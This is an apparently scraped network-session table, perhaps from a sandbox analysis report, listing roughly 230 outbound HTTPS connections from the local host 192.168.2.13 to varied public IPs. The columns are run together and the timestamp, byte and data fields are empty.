                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11304192.168.2.1357536166.251.49.104443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11305192.168.2.1345366176.38.63.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11306192.168.2.1352974162.225.201.235443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11307192.168.2.135100840.172.186.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11308192.168.2.1343536156.43.207.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11309192.168.2.134026217.211.127.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11310192.168.2.1342330220.134.112.207443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11311192.168.2.136071454.154.107.41443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11312192.168.2.1358044174.232.131.201443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11313192.168.2.134359651.245.205.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11314192.168.2.133501462.240.54.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11315192.168.2.1339388183.70.4.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11316192.168.2.1358680100.209.191.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11317192.168.2.1332830196.137.153.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11318192.168.2.1340766149.38.145.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11319192.168.2.133697044.110.221.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11320192.168.2.1352506198.110.83.7443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11321192.168.2.1354460203.100.46.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11322192.168.2.1339674122.109.43.251443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11323192.168.2.134567825.69.206.167443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11324192.168.2.1354102162.126.155.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11325192.168.2.134243819.91.29.126443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11326192.168.2.1346888167.138.110.151443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11327192.168.2.136047223.250.220.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11328192.168.2.1341338101.94.112.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11329192.168.2.1360986181.169.211.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11330192.168.2.133823836.46.168.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11331192.168.2.133997648.125.59.66443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11332192.168.2.133372063.198.172.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11333192.168.2.134931624.14.120.203443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11334192.168.2.1336960188.64.122.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11335192.168.2.135364062.67.221.192443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11336192.168.2.133985678.77.2.154443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11337192.168.2.1339960180.3.233.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11338192.168.2.1354404171.134.72.51443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11339192.168.2.135801494.105.230.106443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11340192.168.2.1356422132.244.156.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11341192.168.2.134916047.243.67.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11342192.168.2.1338850146.248.231.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11343192.168.2.135121054.67.12.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11344192.168.2.1351648179.163.170.31443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11345192.168.2.133668698.142.49.151443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11346192.168.2.1338836216.113.56.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11347192.168.2.133664654.33.206.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11348192.168.2.135437048.148.243.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11349192.168.2.1360956183.250.233.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11350192.168.2.1343252162.131.112.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11351192.168.2.133661043.52.12.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11352192.168.2.1344094148.109.210.211443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11353192.168.2.1354462156.211.200.201443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11354192.168.2.13374949.135.18.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11355192.168.2.1348990202.108.215.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11356192.168.2.1340374208.204.237.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11357192.168.2.1359680209.51.211.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11358192.168.2.1350950222.139.86.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11359192.168.2.133692613.102.72.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11360192.168.2.1350148129.72.183.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11361192.168.2.135583445.255.216.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11362192.168.2.133819251.92.4.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11363192.168.2.1354204218.179.18.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11364192.168.2.13366844.227.109.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11365192.168.2.1341170181.139.92.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11366192.168.2.133639280.188.10.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11367192.168.2.135702447.152.153.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11368192.168.2.1342610176.46.104.50443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11369192.168.2.1350422200.80.101.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11370192.168.2.1351954139.54.63.188443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11371192.168.2.1358398124.59.78.21443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11372192.168.2.133997240.201.203.155443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11373192.168.2.134259075.63.34.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11374192.168.2.1334228130.241.82.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11375192.168.2.1347164221.149.20.193443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11376192.168.2.1350640212.124.79.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11377192.168.2.1335386138.63.34.176443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11378192.168.2.1333884197.142.60.137443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11379192.168.2.1355490163.27.112.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11380192.168.2.1358692164.129.8.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11381192.168.2.1359146213.67.107.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11382192.168.2.135277690.21.183.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11383192.168.2.133621866.247.88.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11384192.168.2.1356938122.250.237.172443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11385192.168.2.134975067.140.223.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11386192.168.2.1344156121.226.172.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11387192.168.2.134487499.188.80.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11388192.168.2.133469627.43.100.68443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11389192.168.2.1342098159.160.10.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11390192.168.2.133879623.215.16.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11391192.168.2.1334796208.20.12.172443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11392192.168.2.134031649.111.33.214443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11393192.168.2.1353386198.107.117.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11394192.168.2.1345314207.62.189.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11395192.168.2.133386867.156.221.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11396192.168.2.135507088.247.224.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11397192.168.2.1346832118.240.47.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11398192.168.2.136077073.151.143.176443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11399192.168.2.1345996200.234.166.235443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11400192.168.2.134541686.162.36.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11401192.168.2.1353530131.68.129.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11402192.168.2.1345704138.34.231.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11403192.168.2.1334638207.250.33.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11404192.168.2.1334480188.255.44.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11405192.168.2.134560412.159.11.203443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11406192.168.2.1359014120.218.50.147443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11407192.168.2.134459219.190.30.31443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11408192.168.2.1345156111.21.193.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11409192.168.2.1343172158.51.74.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11410192.168.2.1341358201.104.253.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11411192.168.2.1333832148.5.49.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11412192.168.2.1351214207.123.208.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11413192.168.2.1334020133.70.117.13443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11414192.168.2.1358602198.221.36.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11415192.168.2.1339356124.206.160.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11416192.168.2.1350684173.82.150.230443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11417192.168.2.135508682.48.150.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11418192.168.2.133416632.217.157.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11419192.168.2.135319034.1.206.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11420192.168.2.1345184136.235.11.110443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11421192.168.2.1332834110.166.39.150443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11422192.168.2.133779085.164.220.238443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11423192.168.2.1344414191.212.207.75443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11424192.168.2.1359474177.184.111.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11425192.168.2.1346414192.178.70.31443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11426192.168.2.1358288200.199.15.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11427192.168.2.135102619.49.178.12443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11428192.168.2.134139012.168.169.214443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11429192.168.2.1360400135.103.213.64443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11430192.168.2.1353866210.156.228.81443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11431192.168.2.135258653.108.65.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11432192.168.2.1344654210.93.253.251443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11433192.168.2.135542036.240.237.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11434192.168.2.133313036.128.88.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11435192.168.2.1344818181.237.164.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11436192.168.2.133611441.54.27.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11437192.168.2.135823274.12.106.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11438192.168.2.133914423.65.49.142443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11439192.168.2.1359986141.156.26.83443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11440192.168.2.1344048113.127.118.218443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11441192.168.2.134765017.163.97.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11442192.168.2.1335648111.157.159.25443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11443192.168.2.135830696.203.5.130443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11444192.168.2.134176860.133.14.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11445192.168.2.1350676206.223.16.195443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11446192.168.2.135680490.125.83.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11447192.168.2.1353174118.36.66.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11448192.168.2.1338870108.112.63.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11449192.168.2.1355588108.190.140.145443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11450192.168.2.1355796132.151.94.83443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11451192.168.2.135425848.89.255.207443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11452192.168.2.133939471.167.231.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11453192.168.2.1354934171.210.69.245443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11454192.168.2.135763087.197.236.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11455192.168.2.1353050117.196.40.54443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11456192.168.2.134253853.3.254.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11457192.168.2.133993878.148.29.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11458192.168.2.133831442.103.144.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11459192.168.2.1347078162.100.26.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11460192.168.2.134347450.100.68.168443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11461192.168.2.133290434.234.16.34443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11462192.168.2.1348710114.136.63.203443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11463192.168.2.133298487.186.114.12443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11464192.168.2.135671853.147.191.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11465192.168.2.133995231.114.119.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11466192.168.2.1355494188.171.144.222443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11467192.168.2.1352570144.106.37.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11468192.168.2.135163296.113.221.37443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11469192.168.2.1356960111.173.29.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11470192.168.2.1341702109.108.94.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11471192.168.2.1359048162.238.165.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11472192.168.2.1348194153.192.97.17443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11473192.168.2.135890053.226.123.107443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11474192.168.2.1354886162.189.68.188443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11475192.168.2.1348996164.122.189.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11476192.168.2.133754286.59.234.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11477192.168.2.135470645.123.181.108443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11478192.168.2.1356658173.158.233.41443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11479192.168.2.136091658.130.21.48443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11480192.168.2.1335902132.122.71.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11481192.168.2.1359414112.246.126.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11482192.168.2.133598493.78.55.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11483192.168.2.134810494.43.126.207443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11484192.168.2.1336558219.47.86.177443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11485192.168.2.135219888.73.204.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11486192.168.2.1343312106.161.6.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11487192.168.2.135017027.86.168.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11488192.168.2.134799467.154.152.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11489192.168.2.1357752143.235.2.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11490192.168.2.135971820.192.173.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11491192.168.2.1336860204.95.185.69443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11492192.168.2.1359044202.22.81.168443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11493192.168.2.133953640.157.52.51443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11494192.168.2.134513836.4.248.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11495192.168.2.1356622107.221.77.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11496192.168.2.1344138213.43.133.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11497192.168.2.135210445.86.28.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11498192.168.2.1360268158.225.71.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11499192.168.2.133361871.4.15.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11500192.168.2.1340574118.9.207.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11501192.168.2.134180014.45.150.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11502192.168.2.1356702102.81.250.131443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11503192.168.2.1334872158.92.220.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11504192.168.2.1353654166.76.189.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11505192.168.2.1347776181.48.237.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11506192.168.2.1356758193.155.165.110443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11507192.168.2.135228895.174.254.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11508192.168.2.134196678.2.84.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11509192.168.2.1343654177.206.217.222443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11510192.168.2.135641019.167.19.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11511192.168.2.134603650.9.163.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11512192.168.2.1348826123.113.7.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11513192.168.2.13449145.237.70.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11514192.168.2.136091413.230.97.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11515192.168.2.1340228182.209.96.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11516192.168.2.135971897.61.49.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11517192.168.2.1355766126.132.194.75443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11518192.168.2.133916094.154.149.64443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11519192.168.2.1357932197.203.30.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11520192.168.2.134334882.171.246.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11521192.168.2.133638047.239.143.188443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11522192.168.2.1337572212.174.100.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11523192.168.2.1356782122.248.239.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11524192.168.2.133984459.76.53.37443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11525192.168.2.133824617.8.31.92443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11526192.168.2.1360072104.251.207.86443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11527192.168.2.1350186130.215.160.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11528192.168.2.135721413.97.100.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11529192.168.2.13519649.51.109.86443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11530192.168.2.1354210107.76.73.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11531192.168.2.134796217.238.201.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11532192.168.2.1349878128.117.65.203443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11533192.168.2.1359584195.43.190.149443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11534192.168.2.1340038110.203.84.62443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11535192.168.2.1341718186.79.235.94443
                              TimestampBytes transferredDirectionData


